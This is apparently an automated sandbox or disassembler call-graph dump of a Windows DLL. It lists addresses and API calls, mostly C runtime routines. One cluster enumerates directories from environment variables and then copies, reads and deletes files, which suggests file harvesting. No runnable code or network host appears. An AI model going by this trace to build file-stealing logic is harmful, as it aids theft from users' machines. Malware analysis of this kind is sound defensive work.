21364c0f GetModuleFileNameA 7208->7209 7210 21366d69 7208->7210 7209->7193 7218 21366c5f 7210->7218 7214 21364d26 7212->7214 7216 21364d86 7214->7216 7393 213670eb 7214->7393 7215 21364c50 7215->7198 7216->7215 7217 213670eb 38 API calls 7216->7217 7217->7216 7219 21365af6 _abort 38 API calls 7218->7219 7220 21366c6c 7219->7220 7238 21366d7e 7220->7238 7222 21366c74 7247 213669f3 7222->7247 7225 21366c8b 7225->7209 7226 213656d0 21 API calls 7227 21366c9c 7226->7227 7228 21366cce 7227->7228 7254 21366e20 7227->7254 7231 2136571e _free 20 API calls 7228->7231 7231->7225 7232 21366cc9 7233 21366368 _free 20 API calls 7232->7233 7233->7228 7234 21366d12 7234->7228 7264 213668c9 7234->7264 7235 21366ce6 7235->7234 7236 2136571e _free 20 API calls 7235->7236 7236->7234 7239 21366d8a ___scrt_is_nonwritable_in_current_image 7238->7239 7240 21365af6 _abort 38 API calls 7239->7240 7245 21366d94 7240->7245 7242 21366e18 _abort 7242->7222 7244 213655a8 _abort 38 API calls 7244->7245 7245->7242 7245->7244 7246 2136571e _free 20 API calls 7245->7246 7267 21365671 RtlEnterCriticalSection 7245->7267 7268 21366e0f 7245->7268 7246->7245 7272 213654a7 7247->7272 7250 21366a26 7252 21366a2b GetACP 7250->7252 7253 21366a3d 7250->7253 7251 21366a14 GetOEMCP 7251->7253 7252->7253 7253->7225 7253->7226 7255 213669f3 40 API calls 7254->7255 7256 21366e3f 7255->7256 7259 21366e90 IsValidCodePage 7256->7259 7261 21366e46 7256->7261 7263 21366eb5 ___scrt_fastfail 7256->7263 7257 21362ada _ValidateLocalCookies 5 API calls 7258 21366cc1 7257->7258 7258->7232 7258->7235 7260 21366ea2 GetCPInfo 7259->7260 7259->7261 7260->7261 7260->7263 7261->7257 7284 21366acb GetCPInfo 7263->7284 7357 21366886 7264->7357 7266 213668ed 7266->7228 7267->7245 7271 213656b9 RtlLeaveCriticalSection 7268->7271 7270 21366e16 7270->7245 7271->7270 7273 213654c4 7272->7273 7274 213654ba 7272->7274 7273->7274 7275 21365af6 _abort 38 API calls 7273->7275 7274->7250 7274->7251 7276 213654e5 7275->7276 7277 21367a00 __fassign 38 API calls 7276->7277 7278 213654fe 7277->7278 7280 21367a2d 7278->7280 7281 21367a55 7280->7281 7282 21367a40 7280->7282 7281->7274 7282->7281 7283 21366d7e __fassign 38 API calls 7282->7283 7283->7281 7285 21366b05 7284->7285 7286 21366baf 7284->7286 7294 213686e4 7285->7294 7289 21362ada _ValidateLocalCookies 5 API calls 7286->7289 7291 21366c5b 7289->7291 7291->7261 7293 21368a3e 43 API calls 7293->7286 7295 213654a7 __fassign 38 API calls 7294->7295 7296 21368704 MultiByteToWideChar 7295->7296 7298 213687da 7296->7298 7299 21368742 7296->7299 7300 21362ada _ValidateLocalCookies 5 API calls 7298->7300 7301 213656d0 21 API calls 7299->7301 7305 21368763 ___scrt_fastfail 7299->7305 7302 21366b66 7300->7302 7301->7305 7308 21368a3e 7302->7308 7303 213687d4 7313 21368801 7303->7313 7305->7303 7306 213687a8 MultiByteToWideChar 7305->7306 7306->7303 7307 213687c4 GetStringTypeW 7306->7307 7307->7303 7309 213654a7 __fassign 38 API calls 7308->7309 7310 21368a51 7309->7310 7317 21368821 7310->7317 7314 2136881e 7313->7314 7315 2136880d 7313->7315 7314->7298 7315->7314 7316 2136571e _free 20 API calls 7315->7316 7316->7314 7318 2136883c 7317->7318 7319 21368862 MultiByteToWideChar 7318->7319 7323 2136888c 7319->7323 7331 21368a16 7319->7331 7320 21362ada _ValidateLocalCookies 5 API calls 7321 21366b87 7320->7321 7321->7293 7322 213688ad 7325 213688f6 MultiByteToWideChar 7322->7325 7326 21368962 7322->7326 7323->7322 7324 213656d0 21 API calls 7323->7324 7324->7322 7325->7326 7327 2136890f 7325->7327 7329 21368801 __freea 20 API calls 7326->7329 7344 21365f19 7327->7344 7329->7331 7331->7320 7332 21368971 7336 213656d0 21 API calls 7332->7336 7339 21368992 7332->7339 7333 21368939 7333->7326 7334 21365f19 11 API calls 7333->7334 7334->7326 7335 21368a07 7338 21368801 __freea 20 API calls 7335->7338 7336->7339 7337 21365f19 11 API calls 7340 213689e6 7337->7340 7338->7326 7339->7335 7339->7337 7340->7335 7341 213689f5 WideCharToMultiByte 7340->7341 7341->7335 7342 21368a35 7341->7342 7343 21368801 __freea 20 API calls 7342->7343 7343->7326 7345 21365c45 _abort 5 API calls 7344->7345 7346 21365f40 7345->7346 7347 21365f49 7346->7347 7352 21365fa1 7346->7352 7350 21362ada _ValidateLocalCookies 5 API calls 7347->7350 7351 21365f9b 7350->7351 7351->7326 7351->7332 7351->7333 7353 21365c45 _abort 5 API calls 7352->7353 7354 21365fc8 7353->7354 7355 21362ada _ValidateLocalCookies 5 API calls 7354->7355 7356 21365f89 LCMapStringW 7355->7356 7356->7347 7358 21366892 ___scrt_is_nonwritable_in_current_image 7357->7358 7365 21365671 RtlEnterCriticalSection 7358->7365 7360 2136689c 7366 213668f1 7360->7366 7364 213668b5 _abort 7364->7266 7365->7360 7378 21367011 7366->7378 7368 2136693f 7369 21367011 26 API calls 7368->7369 7370 2136695b 7369->7370 7371 21367011 26 API calls 7370->7371 7372 21366979 7371->7372 7373 213668a9 7372->7373 7374 2136571e _free 20 API calls 7372->7374 7375 213668bd 7373->7375 7374->7373 7392 213656b9 RtlLeaveCriticalSection 7375->7392 7377 213668c7 7377->7364 7379 21367022 7378->7379 7388 2136701e 7378->7388 7380 21367029 7379->7380 7384 2136703c ___scrt_fastfail 7379->7384 7381 21366368 _free 20 API calls 7380->7381 7382 2136702e 7381->7382 7383 213662ac _abort 26 API calls 7382->7383 7383->7388 7385 21367073 7384->7385 7386 2136706a 7384->7386 7384->7388 7385->7388 7389 21366368 _free 20 API calls 7385->7389 7387 21366368 _free 20 API calls 7386->7387 7390 2136706f 7387->7390 7388->7368 7389->7390 7391 213662ac _abort 26 API calls 7390->7391 7391->7388 7392->7377 7396 21367092 7393->7396 7397 213654a7 __fassign 38 API calls 7396->7397 7398 213670a6 7397->7398 7398->7214 7680 21364a9a 7681 21365411 38 API calls 7680->7681 7682 21364aa2 7681->7682 6027 21361c5b 6028 21361c6b ___scrt_fastfail 6027->6028 6031 213612ee 6028->6031 6030 21361c87 6032 21361324 ___scrt_fastfail 6031->6032 6033 213613b7 GetEnvironmentVariableW 6032->6033 6057 213610f1 6033->6057 6036 213610f1 57 API calls 6037 21361465 6036->6037 6038 213610f1 57 API calls 6037->6038 6039 21361479 6038->6039 6040 213610f1 57 API calls 6039->6040 6041 2136148d 6040->6041 6042 213610f1 57 API calls 6041->6042 6043 213614a1 6042->6043 6044 213610f1 57 API calls 6043->6044 6045 213614b5 lstrlenW 6044->6045 6046 213614d2 6045->6046 6047 213614d9 lstrlenW 6045->6047 6046->6030 6048 213610f1 57 API calls 6047->6048 6049 21361501 lstrlenW lstrcatW 6048->6049 6050 213610f1 57 API calls 6049->6050 6051 21361539 lstrlenW lstrcatW 6050->6051 6052 213610f1 57 API calls 6051->6052 6053 2136156b lstrlenW lstrcatW 6052->6053 6054 213610f1 57 API calls 6053->6054 6055 2136159d lstrlenW lstrcatW 6054->6055 6056 213610f1 57 API calls 6055->6056 6056->6046 6058 21361118 ___scrt_fastfail 6057->6058 6059 21361129 lstrlenW 6058->6059 6070 21362c40 6059->6070 6062 21361177 lstrlenW FindFirstFileW 6064 213611a0 6062->6064 6065 213611e1 6062->6065 6063 21361168 lstrlenW 6063->6062 6066 213611c7 FindNextFileW 6064->6066 6067 213611aa 6064->6067 6065->6036 6066->6064 6069 213611da FindClose 6066->6069 6067->6066 6072 21361000 6067->6072 6069->6065 6071 21361148 lstrcatW lstrlenW 6070->6071 6071->6062 6071->6063 6073 21361022 ___scrt_fastfail 6072->6073 6074 213610af 6073->6074 6075 2136102f lstrcatW lstrlenW 6073->6075 6078 213610b5 lstrlenW 6074->6078 6079 213610ad 6074->6079 6076 2136105a lstrlenW 6075->6076 6077 2136106b lstrlenW 6075->6077 6076->6077 6089 21361e89 lstrlenW 6077->6089 6103 21361e16 6078->6103 6079->6067 6082 21361088 GetFileAttributesW 6082->6079 6084 2136109c 6082->6084 6083 213610ca 6083->6079 6085 21361e89 5 API calls 6083->6085 6084->6079 6095 2136173a 6084->6095 6086 213610df 6085->6086 6108 213611ea 6086->6108 6090 21362c40 ___scrt_fastfail 6089->6090 6091 21361ea7 lstrcatW lstrlenW 6090->6091 6092 21361ec2 6091->6092 6093 21361ed1 lstrcatW 6091->6093 6092->6093 6094 21361ec7 lstrlenW 6092->6094 6093->6082 6094->6093 6096 21361747 ___scrt_fastfail 6095->6096 6123 21361cca 6096->6123 6100 2136199f 6100->6079 6101 21361824 ___scrt_fastfail _strlen 6101->6100 6143 213615da 6101->6143 6104 21361e29 6103->6104 6107 21361e4c 6103->6107 6105 21361e2d lstrlenW 6104->6105 6104->6107 6106 21361e3f lstrlenW 6105->6106 6105->6107 6106->6107 6107->6083 6109 2136120e ___scrt_fastfail 6108->6109 6110 21361e89 5 API calls 6109->6110 6111 21361220 GetFileAttributesW 6110->6111 6112 21361246 6111->6112 6113 21361235 6111->6113 6114 21361e89 5 API calls 6112->6114 6113->6112 6116 2136173a 35 API calls 6113->6116 6115 21361258 6114->6115 6117 213610f1 56 API calls 6115->6117 6116->6112 6118 2136126d 6117->6118 6119 21361e89 5 API calls 6118->6119 6120 2136127f ___scrt_fastfail 6119->6120 6121 213610f1 56 API calls 6120->6121 6122 213612e6 6121->6122 6122->6079 6124 21361cf1 ___scrt_fastfail 6123->6124 6125 21361d0f CopyFileW CreateFileW 6124->6125 6126 21361d44 DeleteFileW 6125->6126 6127 21361d55 GetFileSize 6125->6127 6132 21361808 6126->6132 6128 21361ede 22 API calls 6127->6128 6129 21361d66 ReadFile 6128->6129 6130 21361d94 CloseHandle DeleteFileW 6129->6130 6131 21361d7d CloseHandle DeleteFileW 6129->6131 6130->6132 6131->6132 6132->6100 6133 21361ede 6132->6133 6135 2136222f 6133->6135 6136 2136224e 6135->6136 6138 21362250 6135->6138 6151 2136474f 6135->6151 6156 213647e5 6135->6156 6136->6101 6139 21362908 6138->6139 6163 213635d2 6138->6163 6140 213635d2 __CxxThrowException@8 RaiseException 6139->6140 6142 21362925 6140->6142 6142->6101 6144 2136160c _strcat _strlen 6143->6144 6145 2136163c lstrlenW 6144->6145 6243 21361c9d 6145->6243 6147 21361655 lstrcatW lstrlenW 6148 21361678 6147->6148 6149 21361693 ___scrt_fastfail 6148->6149 6150 2136167e lstrcatW 6148->6150 6149->6101 6150->6149 6166 21364793 6151->6166 6153 21362ada _ValidateLocalCookies 5 API calls 6154 2136478f 6153->6154 6154->6135 6155 21364765 6155->6153 6161 213656d0 _abort 6156->6161 6157 2136570e 6177 21366368 6157->6177 6158 213656f9 RtlAllocateHeap 6160 2136570c 6158->6160 6158->6161 6160->6135 6161->6157 6161->6158 6162 2136474f _abort 7 API calls 6161->6162 6162->6161 6165 213635f2 RaiseException 6163->6165 6165->6139 6167 2136479f ___scrt_is_nonwritable_in_current_image 6166->6167 6172 21365671 RtlEnterCriticalSection 6167->6172 6169 213647aa 6173 213647dc 6169->6173 6171 213647d1 _abort 6171->6155 6172->6169 6176 213656b9 RtlLeaveCriticalSection 6173->6176 6175 213647e3 6175->6171 6176->6175 6180 21365b7a GetLastError 6177->6180 6181 21365b93 6180->6181 6182 21365b99 6180->6182 6199 21365e08 6181->6199 6186 21365bf0 SetLastError 6182->6186 6206 2136637b 6182->6206 6188 21365bf9 6186->6188 6188->6160 6189 21365bb3 6213 2136571e 6189->6213 6192 21365bb9 6194 21365be7 SetLastError 6192->6194 6193 21365bcf 6226 2136593c 6193->6226 6194->6188 6197 2136571e _free 17 API calls 6198 21365be0 6197->6198 6198->6186 6198->6194 6231 21365c45 6199->6231 6201 21365e2f 6202 21365e47 TlsGetValue 6201->6202 6203 21365e3b 6201->6203 6202->6203 6204 21362ada _ValidateLocalCookies 5 API calls 6203->6204 6205 21365e58 6204->6205 6205->6182 6211 21366388 _abort 6206->6211 6207 213663b3 RtlAllocateHeap 6209 21365bab 6207->6209 6207->6211 6208 213663c8 6210 21366368 _free 19 API calls 6208->6210 6209->6189 6219 21365e5e 6209->6219 6210->6209 6211->6207 6211->6208 6212 2136474f _abort 7 API calls 6211->6212 6212->6211 6214 21365752 _free 6213->6214 6215 21365729 HeapFree 6213->6215 6214->6192 6215->6214 6216 2136573e 6215->6216 6217 21366368 _free 18 API calls 6216->6217 6218 21365744 GetLastError 6217->6218 6218->6214 6220 21365c45 _abort 5 API calls 6219->6220 6221 21365e85 6220->6221 6222 21365ea0 TlsSetValue 6221->6222 6223 21365e94 6221->6223 6222->6223 6224 21362ada _ValidateLocalCookies 5 API calls 6223->6224 6225 21365bc8 6224->6225 6225->6189 6225->6193 6237 21365914 6226->6237 6232 21365c75 __crt_fast_encode_pointer 6231->6232 6234 21365c71 6231->6234 6232->6201 6233 21365ce1 _abort LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 6233->6234 6234->6232 6234->6233 6236 21365c95 6234->6236 6235 21365ca1 GetProcAddress 6235->6232 6236->6232 6236->6235 6238 21365854 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 6237->6238 6239 21365938 6238->6239 6240 213658c4 6239->6240 6241 21365758 _abort 20 API calls 6240->6241 6242 213658e8 6241->6242 6242->6197 6244 21361ca6 _strlen 6243->6244 6244->6147 6245 213620db 6246 213620e7 ___scrt_is_nonwritable_in_current_image 6245->6246 6247 21362110 dllmain_raw 6246->6247 6249 213620f6 6246->6249 6254 2136210b 6246->6254 6248 2136212a 6247->6248 6247->6249 6258 21361eec 6248->6258 6251 21362177 6251->6249 6252 21361eec 31 API calls 6251->6252 6253 2136218a 6252->6253 6253->6249 6255 21362193 dllmain_raw 6253->6255 6254->6249 6254->6251 6256 21361eec 31 API calls 6254->6256 6255->6249 6257 2136216d dllmain_raw 6256->6257 6257->6251 6259 21361ef7 6258->6259 6260 21361f2a dllmain_crt_process_detach 6258->6260 6261 21361f1c dllmain_crt_process_attach 6259->6261 6262 21361efc 6259->6262 6265 21361f06 6260->6265 6261->6265 6263 21361f12 6262->6263 6264 21361f01 6262->6264 6273 213623ec 6263->6273 6264->6265 6268 2136240b 6264->6268 6265->6254 6281 213653e5 6268->6281 6402 21363513 6273->6402 6278 21362408 6278->6265 6279 2136351e 7 API calls 6280 213623f5 6279->6280 6280->6265 6287 21365aca 6281->6287 6284 2136351e 6391 21363820 6284->6391 6286 21362415 6286->6265 6288 21365ad4 6287->6288 6289 21362410 6287->6289 6290 21365e08 _abort 11 API calls 6288->6290 6289->6284 6291 21365adb 6290->6291 6291->6289 6292 21365e5e _abort 11 API calls 6291->6292 6293 21365aee 6292->6293 6295 213659b5 6293->6295 6296 213659d0 6295->6296 6297 213659c0 6295->6297 6296->6289 6301 213659d6 6297->6301 6300 2136571e _free 20 API calls 6300->6296 6302 213659ef 6301->6302 6303 213659e9 6301->6303 6305 2136571e _free 20 API calls 6302->6305 6304 2136571e _free 20 API calls 6303->6304 6304->6302 6306 213659fb 6305->6306 6307 2136571e _free 20 API calls 6306->6307 6308 21365a06 6307->6308 6309 2136571e _free 20 API calls 6308->6309 6310 21365a11 6309->6310 6311 2136571e _free 20 API calls 6310->6311 6312 21365a1c 6311->6312 6313 2136571e _free 20 API calls 6312->6313 6314 21365a27 6313->6314 6315 2136571e _free 20 API calls 6314->6315 6316 21365a32 6315->6316 6317 2136571e _free 20 API calls 6316->6317 6318 21365a3d 6317->6318 6319 2136571e _free 20 API calls 6318->6319 6320 21365a48 6319->6320 6321 2136571e _free 20 API calls 6320->6321 6322 21365a56 6321->6322 6327 2136589c 6322->6327 6333 213657a8 6327->6333 6329 213658c0 6330 213658ec 6329->6330 6346 21365809 6330->6346 6332 21365910 6332->6300 6334 213657b4 ___scrt_is_nonwritable_in_current_image 6333->6334 6341 21365671 RtlEnterCriticalSection 6334->6341 6336 213657e8 6342 213657fd 6336->6342 6338 213657be 6338->6336 6340 2136571e _free 20 API calls 6338->6340 6339 213657f5 _abort 6339->6329 6340->6336 6341->6338 6345 213656b9 RtlLeaveCriticalSection 6342->6345 6344 21365807 6344->6339 6345->6344 6347 21365815 ___scrt_is_nonwritable_in_current_image 6346->6347 6354 21365671 RtlEnterCriticalSection 6347->6354 6349 2136581f 6355 21365a7f 6349->6355 6351 21365832 6359 21365848 6351->6359 6353 21365840 _abort 6353->6332 6354->6349 6356 21365ab5 __fassign 6355->6356 6357 21365a8e __fassign 6355->6357 6356->6351 6357->6356 6362 21367cc2 6357->6362 6390 213656b9 RtlLeaveCriticalSection 6359->6390 6361 21365852 6361->6353 6363 21367d42 6362->6363 6366 21367cd8 6362->6366 6365 2136571e _free 20 API calls 6363->6365 6388 21367d90 6363->6388 6364 21367e35 __fassign 20 API calls 6378 21367d9e 6364->6378 6367 21367d64 6365->6367 6366->6363 6368 21367d0b 6366->6368 6372 2136571e _free 20 API calls 6366->6372 6369 2136571e _free 20 API calls 6367->6369 6374 2136571e _free 20 API calls 6368->6374 6389 21367d2d 6368->6389 6370 21367d77 6369->6370 6373 2136571e _free 20 API calls 6370->6373 6371 2136571e _free 20 API calls 6375 21367d37 6371->6375 6377 21367d00 6372->6377 6380 21367d85 6373->6380 6381 21367d22 6374->6381 6382 2136571e _free 20 API calls 6375->6382 6376 21367dfe 6383 2136571e _free 20 API calls 6376->6383 6379 213690ba ___free_lconv_mon 20 API calls 6377->6379 6378->6376 6386 2136571e 20 API calls _free 6378->6386 6379->6368 6384 2136571e _free 20 API calls 6380->6384 6385 213691b8 __fassign 20 API calls 6381->6385 6382->6363 6387 21367e04 6383->6387 6384->6388 6385->6389 6386->6378 6387->6356 6388->6364 6389->6371 6390->6361 6392 2136382d 6391->6392 6396 2136384b ___vcrt_freefls@4 6391->6396 6393 2136383b 6392->6393 6397 21363b67 6392->6397 6394 21363ba2 ___vcrt_FlsSetValue 6 API calls 6393->6394 6394->6396 6396->6286 6398 21363a82 try_get_function 5 API calls 6397->6398 6399 21363b81 6398->6399 6400 21363b99 TlsGetValue 6399->6400 6401 21363b8d 6399->6401 6400->6401 6401->6393 6408 21363856 6402->6408 6404 213623f1 6404->6280 6405 213653da 6404->6405 6406 21365b7a _abort 20 API calls 6405->6406 6407 213623fd 6406->6407 6407->6278 6407->6279 6409 21363862 GetLastError 6408->6409 6410 2136385f 6408->6410 6411 21363b67 ___vcrt_FlsGetValue 6 API calls 6409->6411 6410->6404 6412 21363877 6411->6412 6413 213638dc SetLastError 6412->6413 6414 21363ba2 ___vcrt_FlsSetValue 6 API calls 6412->6414 6419 21363896 6412->6419 6413->6404 6415 21363890 6414->6415 6416 213638b8 6415->6416 6418 21363ba2 ___vcrt_FlsSetValue 6 API calls 6415->6418 6415->6419 6417 21363ba2 ___vcrt_FlsSetValue 6 API calls 6416->6417 6416->6419 6417->6419 6418->6416 6419->6413 7462 21362418 7464 21362420 ___scrt_release_startup_lock 7462->7464 7466 213647f5 7464->7466 7465 21362448 7467 21364804 7466->7467 7468 21364808 7466->7468 7467->7465 7471 21364815 7468->7471 7472 21365b7a _abort 20 API calls 7471->7472 7475 2136482c 7472->7475 7473 21362ada _ValidateLocalCookies 5 API calls 7474 21364811 7473->7474 7474->7465 7475->7473 7399 2136a1c6 IsProcessorFeaturePresent 7400 21367bc7 7401 21367bd3 ___scrt_is_nonwritable_in_current_image 7400->7401 7402 21367c0a _abort 7401->7402 7408 21365671 RtlEnterCriticalSection 7401->7408 7404 21367be7 7409 21367f86 7404->7409 7408->7404 7410 21367bf7 7409->7410 7411 21367f94 __fassign 7409->7411 7413 21367c10 7410->7413 7411->7410 7412 21367cc2 __fassign 20 API calls 7411->7412 7412->7410 7416 213656b9 RtlLeaveCriticalSection 7413->7416 7415 21367c17 7415->7402 7416->7415 6470 2136a945 6472 2136a96d 6470->6472 6471 2136a9a5 6472->6471 6473 2136a997 6472->6473 6474 2136a99e 6472->6474 6479 2136aa17 6473->6479 6483 2136aa00 6474->6483 6480 2136aa20 6479->6480 6487 2136b19b 6480->6487 6484 2136aa20 6483->6484 6485 2136b19b __startOneArgErrorHandling 21 API calls 6484->6485 6486 2136a9a3 6485->6486 6488 2136b1da __startOneArgErrorHandling 6487->6488 6493 2136b25c __startOneArgErrorHandling 6488->6493 6497 2136b59e 6488->6497 6490 2136b286 6492 2136b292 6490->6492 6504 2136b8b2 6490->6504 6495 21362ada _ValidateLocalCookies 5 API calls 6492->6495 6493->6490 6500 213678a3 6493->6500 6496 2136a99c 6495->6496 6511 2136b5c1 6497->6511 6501 213678cb 6500->6501 6502 21362ada _ValidateLocalCookies 5 API calls 6501->6502 6503 213678e8 6502->6503 6503->6490 6505 2136b8d4 6504->6505 6506 2136b8bf 6504->6506 6507 21366368 _free 20 API calls 6505->6507 6508 2136b8d9 6506->6508 6509 21366368 _free 20 API calls 6506->6509 6507->6508 6508->6492 6510 2136b8cc 6509->6510 6510->6492 6512 2136b5ec __raise_exc 6511->6512 6513 2136b7e5 RaiseException 6512->6513 6514 2136b5bc 6513->6514 6514->6493 6420 21367103 GetCommandLineA GetCommandLineW 6421 21365303 6424 213650a5 6421->6424 6433 2136502f 6424->6433 6427 2136502f 5 API calls 6428 213650c3 6427->6428 6437 21365000 6428->6437 6431 21365000 20 API calls 6432 213650d9 6431->6432 6436 21365048 6433->6436 6434 21362ada _ValidateLocalCookies 5 API calls 6435 21365069 6434->6435 6435->6427 6436->6434 6438 2136502a 6437->6438 6439 2136500d 6437->6439 6438->6431 6440 21365024 6439->6440 6441 2136571e _free 20 API calls 6439->6441 6442 2136571e _free 20 API calls 6440->6442 6441->6439 6442->6438 6515 2136af43 6516 2136af4d 6515->6516 6517 2136af59 6515->6517 6516->6517 6518 2136af52 CloseHandle 6516->6518 6518->6517 7512 21368640 7515 21368657 7512->7515 7516 21368665 7515->7516 7517 21368679 7515->7517 7518 21366368 _free 20 API calls 7516->7518 7519 21368693 7517->7519 7520 21368681 7517->7520 7521 2136866a 7518->7521 7525 213654a7 __fassign 38 API calls 7519->7525 7527 21368652 7519->7527 7522 21366368 _free 20 API calls 7520->7522 7523 213662ac _abort 26 API calls 7521->7523 7524 21368686 7522->7524 7523->7527 7526 213662ac _abort 26 API calls 7524->7526 7525->7527 7526->7527 7683 21367a80 7684 21367a8d 7683->7684 7685 2136637b _abort 20 API calls 7684->7685 7686 21367aa7 7685->7686 7687 2136571e _free 20 API calls 7686->7687 7688 21367ab3 7687->7688 7689 2136637b _abort 20 API calls 7688->7689 7693 21367ad9 7688->7693 7690 21367acd 7689->7690 7692 2136571e _free 20 API calls 7690->7692 7691 21365eb7 11 API calls 7691->7693 7692->7693 7693->7691 7694 21367ae5 7693->7694 7695 21367b43 7693->7695 7528 2136724e GetProcessHeap 7529 2136284f 7530 21362882 std::exception::exception 27 API calls 7529->7530 7531 2136285d 7530->7531 6018 2136220c 6019 21362215 6018->6019 6020 2136221a dllmain_dispatch 6018->6020 6022 213622b1 6019->6022 6023 213622c7 6022->6023 6025 213622d0 6023->6025 6026 21362264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6023->6026 6025->6020 6026->6025 6519 21365348 6520 21363529 ___vcrt_uninitialize 8 API calls 6519->6520 6521 2136534f 6520->6521 6522 21367b48 6532 21368ebf 6522->6532 6526 21367b55 6545 2136907c 6526->6545 6529 21367b7f 6530 2136571e _free 20 API calls 6529->6530 6531 21367b8a 6530->6531 6549 21368ec8 6532->6549 6534 21367b50 6535 21368fdc 6534->6535 6536 21368fe8 ___scrt_is_nonwritable_in_current_image 6535->6536 6569 21365671 RtlEnterCriticalSection 6536->6569 6538 2136905e 6583 21369073 6538->6583 6539 21368ff3 6539->6538 6541 21369032 RtlDeleteCriticalSection 6539->6541 6570 2136a09c 6539->6570 6544 2136571e _free 20 API calls 6541->6544 6542 2136906a _abort 6542->6526 6544->6539 6546 21367b64 RtlDeleteCriticalSection 6545->6546 6547 21369092 6545->6547 6546->6526 6546->6529 6547->6546 6548 2136571e _free 20 API calls 6547->6548 6548->6546 6550 21368ed4 ___scrt_is_nonwritable_in_current_image 6549->6550 6559 21365671 RtlEnterCriticalSection 6550->6559 6552 21368f77 6564 21368f97 6552->6564 6553 21368ee3 6553->6552 6558 21368e78 66 API calls 6553->6558 6560 21367b94 RtlEnterCriticalSection 6553->6560 6561 21368f6d 6553->6561 6556 21368f83 _abort 6556->6534 6558->6553 6559->6553 6560->6553 6567 21367ba8 RtlLeaveCriticalSection 6561->6567 6563 21368f75 6563->6553 6568 213656b9 RtlLeaveCriticalSection 6564->6568 6566 21368f9e 6566->6556 6567->6563 6568->6566 6569->6539 6571 2136a0a8 ___scrt_is_nonwritable_in_current_image 6570->6571 6572 2136a0ce 6571->6572 6573 2136a0b9 6571->6573 6582 2136a0c9 _abort 6572->6582 6589 21367b94 RtlEnterCriticalSection 6572->6589 6574 21366368 _free 20 API calls 6573->6574 6576 2136a0be 6574->6576 6586 213662ac 6576->6586 6577 2136a0ea 6590 2136a026 6577->6590 6580 2136a0f5 6606 2136a112 6580->6606 6582->6539 6955 213656b9 RtlLeaveCriticalSection 6583->6955 6585 2136907a 6585->6542 6609 21366231 6586->6609 6588 213662b8 6588->6582 6589->6577 6591 2136a033 6590->6591 6592 2136a048 6590->6592 6593 21366368 _free 20 API calls 6591->6593 6596 2136a043 6592->6596 6630 21368e12 6592->6630 6595 2136a038 6593->6595 6598 213662ac _abort 26 API calls 6595->6598 6596->6580 6598->6596 6599 2136907c 20 API calls 6600 2136a064 6599->6600 6636 21367a5a 6600->6636 6602 2136a06a 6643 2136adce 6602->6643 6605 2136571e _free 20 API calls 6605->6596 6954 21367ba8 RtlLeaveCriticalSection 6606->6954 6608 2136a11a 6608->6582 6610 21365b7a _abort 20 API calls 6609->6610 6611 21366247 6610->6611 6612 213662a6 6611->6612 6616 21366255 6611->6616 6620 213662bc IsProcessorFeaturePresent 6612->6620 6614 213662ab 6615 21366231 _abort 26 API calls 6614->6615 6617 213662b8 6615->6617 6618 21362ada _ValidateLocalCookies 5 API calls 6616->6618 6617->6588 6619 2136627c 6618->6619 6619->6588 6621 213662c7 6620->6621 6624 213660e2 6621->6624 6625 213660fe ___scrt_fastfail 6624->6625 6626 2136612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6625->6626 6627 213661fb ___scrt_fastfail 6626->6627 6628 21362ada _ValidateLocalCookies 5 API calls 6627->6628 6629 21366219 GetCurrentProcess TerminateProcess 6628->6629 6629->6614 6631 21368e26 6630->6631 6632 21368e2a 6630->6632 6631->6599 6632->6631 6633 21367a5a 26 API calls 6632->6633 6634 21368e4a 6633->6634 6658 21369a22 6634->6658 6637 21367a66 6636->6637 6638 21367a7b 6636->6638 6639 21366368 _free 20 API calls 6637->6639 6638->6602 6640 21367a6b 6639->6640 6641 213662ac _abort 26 API calls 6640->6641 6642 21367a76 6641->6642 6642->6602 6644 2136adf2 6643->6644 6645 2136addd 6643->6645 6647 2136ae2d 6644->6647 6651 2136ae19 6644->6651 6646 21366355 __dosmaperr 20 API calls 6645->6646 6648 2136ade2 6646->6648 6649 21366355 __dosmaperr 20 API calls 6647->6649 6650 21366368 _free 20 API calls 6648->6650 6652 2136ae32 6649->6652 6656 2136a070 6650->6656 6911 2136ada6 6651->6911 6654 21366368 _free 20 API calls 6652->6654 6655 2136ae3a 6654->6655 6657 213662ac _abort 26 API calls 6655->6657 6656->6596 6656->6605 6657->6656 6659 21369a2e ___scrt_is_nonwritable_in_current_image 6658->6659 6660 21369a36 6659->6660 6661 21369a4e 6659->6661 6683 21366355 6660->6683 6663 21369aec 6661->6663 6667 21369a83 6661->6667 6665 21366355 __dosmaperr 20 API calls 6663->6665 6668 21369af1 6665->6668 6666 21366368 _free 20 API calls 6676 21369a43 _abort 6666->6676 6686 21368c7b RtlEnterCriticalSection 6667->6686 6670 21366368 _free 20 API calls 6668->6670 6672 21369af9 6670->6672 6671 21369a89 6673 21369aa5 6671->6673 6674 21369aba 6671->6674 6675 213662ac _abort 26 API calls 6672->6675 6678 21366368 _free 20 API calls 6673->6678 6687 21369b0d 6674->6687 6675->6676 6676->6631 6680 21369aaa 6678->6680 6679 21369ab5 6738 21369ae4 6679->6738 6681 21366355 __dosmaperr 20 API calls 6680->6681 6681->6679 6684 21365b7a _abort 20 API calls 6683->6684 6685 2136635a 6684->6685 6685->6666 6686->6671 6688 21369b3b 6687->6688 6725 21369b34 6687->6725 6689 21369b5e 6688->6689 6690 21369b3f 6688->6690 6694 21369b92 6689->6694 6698 21369baf 6689->6698 6691 21366355 __dosmaperr 20 API calls 6690->6691 6693 21369b44 6691->6693 6692 21362ada _ValidateLocalCookies 5 API calls 6695 21369d15 6692->6695 6696 21366368 _free 20 API calls 6693->6696 6699 21366355 __dosmaperr 20 API calls 6694->6699 6695->6679 6700 21369b4b 6696->6700 6697 21369bc5 6744 213696b2 6697->6744 6698->6697 6741 2136a00b 6698->6741 6703 21369b97 6699->6703 6705 213662ac _abort 26 API calls 6700->6705 6704 21366368 _free 20 API calls 6703->6704 6707 21369b9f 6704->6707 6705->6725 6710 213662ac _abort 26 API calls 6707->6710 6708 21369bd3 6713 21369bd7 6708->6713 6714 21369bf9 6708->6714 6709 21369c0c 6711 21369c66 WriteFile 6709->6711 6712 21369c20 6709->6712 6710->6725 6715 21369c89 GetLastError 6711->6715 6721 21369bef 6711->6721 6717 21369c56 6712->6717 6718 21369c28 6712->6718 6719 21369ccd 6713->6719 6751 21369645 6713->6751 6756 21369492 GetConsoleCP 6714->6756 6715->6721 6782 21369728 6717->6782 6722 21369c46 6718->6722 